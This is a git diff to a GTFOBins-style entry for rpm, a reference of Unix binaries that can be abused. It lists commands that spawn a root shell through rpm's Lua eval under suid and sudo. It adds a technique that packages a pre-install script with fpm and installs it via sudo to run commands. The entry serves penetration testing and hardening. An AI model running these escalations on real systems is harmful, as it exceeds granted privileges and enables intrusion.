diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index 6e56eb0..6ef60ae 100644 --- a/_gtfobins/rpm.md +++ b/_gtfobins/rpm.md @@ -6,4 +6,13 @@ functions: - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' sudo: - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' + - description: | + It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. + ``` + TF=$(mktemp -d) + echo 'id' > $TF/x.sh + fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF + ``` + code: | + sudo rpm -ivh x-1.0-1.noarch.rpm ---